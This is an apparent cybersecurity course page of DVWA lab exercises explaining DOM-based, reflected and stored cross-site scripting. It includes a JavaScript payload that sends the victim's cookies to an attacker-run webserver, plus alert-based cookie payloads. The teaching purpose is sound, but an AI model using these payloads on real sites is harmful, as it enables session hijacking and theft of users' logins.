📘
CAS Cybersecurity
  • Start
  • Reconnaissance
    • Opensource Intelligence
  • Docker basics and Images
    • Damn Vulnerable Webapp
    • bWAPP
    • Juice Webshop
    • Webgoat
    • Metasploitable 2
    • Metasploitable 3
    • MISP Docker (old)
    • MISP Docker (new)
  • Scanning and Enumeration
    • Scanning with zenmap
    • Scanning with nmap
    • Scanning with msf auxiliary
  • Vulnerability Scanning and Analysis
    • OpenVAS
    • nmap vulnerability scan
    • MSF Auxiliary Modules
  • Exploitation
    • Metasploitable 2
    • Redis Server
    • Print Nightmare
    • Baron Samedit
    • Polkit
    • Heartbleed
  • Man in the Middle
    • ARP Cache poisoning
    • RDP MitM Exercise
  • Windows Hacking
    • Throwback Network
      • Entering the breach
      • Exploring the caverns
      • Webshells and you!
      • First Contact
    • WinAttack LAB
      • Module 01
      • Module 02
      • Module 03
      • Module 04
      • Module 05
      • Module 06
      • Module 07
      • Module 08
      • Module 09
      • Module 10
  • Web Application Security
    • Burp Proxy Introduction
    • DVWA
      • DVWA Exercises 1
      • DVWA Exercises 2
      • DVWA Exercises 3
      • DVWA Exercises 4
      • DVWA Exercises 5
      • DVWA Exercises 6
      • DVWA Exercises 7
      • DVWA Exercises 8
  • CTF and Crypto Exercises
    • Cyberchef Challenge
    • HTB Invite Challenge
    • BSides London 2019 Challenge
    • Ninja Sec Challenge
  • Threat Intelligence
    • MISP Exercise 1
    • MISP Exercise 2
    • MISP Exercise 3
    • MISP Exercise 4
    • MISP Exercise 5
    • MISP Exercise 6
    • MISP Exercise 7
    • MISP Exercise 8
    • Virus Total Graph Exercise
    • RFI Incoming!
  • Forensic Exercises
    • Disk Forensics
      • The Sleuth Kit Intro
      • Filecarving with Foremost
      • Filecarving with scalpel
      • Bulk extractor
      • Disk acquisition with dd
      • Disk acquisition with dcfldd
      • Disk acquisition with ewftools
      • Disk acquisition with FTK Imager
      • Mount disk image (raw)
      • Unknown USB Stick
      • USB Stick Filecarving
      • Autopsy Exercise
    • Windows Forensics
      • Bitunlocker
      • Alternate Datastreams
    • Memory Forensics
      • Volatility2 Basics (Linux)
      • Volatility2 Exercise 1
      • Volatility3 Exercise 1
      • Volatility3 Exercise 2
      • Volatility3 Exercise 3
    • Image Forensics
      • Unswirl Image
      • Manual Filecarving 1
      • Manual Filecarving 2
    • Browser Forensics
    • Mail Header Analysis
    • Timestomping Exercise
    • Network Forensics
      • Tshark Exercise
  • Malware Analysis
    • Ransomware
      • General Introduction
      • Ryuk
      • RansomEXX
      • REvil
      • BlackMatter
      • Hades
      • Egregor
      • DoppelPaymer
    • YARA
      • YARA Install
      • yarGen
      • YARA with Cyberchef
      • TCP dump analysis
      • Memory dump analysis
    • Dosfuscated Scripts
  • Android Malware
    • LAB Setup 1
    • LAB Setup 2
    • Android Manifest
    • Android Permissions
    • APP Tracing with Frida
    • AES Key decryption
    • RedAlert
    • BlackRoseLucy
    • Crackme RE Challenge
  • Forensic Readiness
    • Windows Event Logs
    • Windows Sysmon
    • Sysmon: Capture Clipboard
    • Sysmon: Process Injection
    • Ransomware Detection
      • Signature based
  • Live Response
    • Velociraptor P1
    • Velociraptor P2
    • Velociraptor P3
    • Windows Response LAB
      • Lateral Movement Detection
      • Detect persistence
      • Volatility Analysis
Powered by GitBook
On this page
  • 15 DOM Based XSS
  • 16 Reflected XSS
  • 17 Stored XSS

Was this helpful?

  1. Web Application Security
  2. DVWA

DVWA Exercises 8

PreviousDVWA Exercises 7NextCTF and Crypto Exercises

Last updated 2 years ago

Was this helpful?

15 DOM Based XSS

Document Object Model-based Cross-site Scripting (DOM-based XSS) is a lesser-known form of XSS. It's different from reflected and stored XSS because the exploit happens entirely on the client-side(!) and does not conceptually require a server-side vulnerability.

The manipulation of the URL happens only client-side. Now let's try to inject a code that will send the cookie to the attacker.

The attacker will start a webserver with a script called dom.js

function getIMAGE() {
	var img = document.createElement('img');
	img.src='http://172.17.0.1:8000/' + document.cookie;
	document.body.appendChild(img);
}
getIMAGE();

Let's execute the attacker payload:

16 Reflected XSS

When you submit something through a form and the website displays what you have written in plain text, that input could potentially be vulnerable to Reflected XSS. This only works if the input isn't escaped and is displayed as-is.

The real gem of this attack is that the source of your script is technically the target website itself because your input is reflected by the website. So, to the browser, the script looks like it came from the website itself and thus must be secure.

<script>alert(document.cookie)</script>

17 Stored XSS

If you are able to store your malicious HTML in the server's database - it's called Stored XSS.

Consider a social media site where you can post your comments or thoughts. If this input and/or the displaying of the text is not protected you can submit a text like <script>alert('Hello there!')</script>. Anyone who visits the site and views your comment would get a pop-up alert on their browser with the message "Hello there!".

Let's put in the following attack payload:

<script>alert(document.cookie)</script>

This script is now permanently stored in the database and will be executed for every visitor!

Popup from scipt alert(1)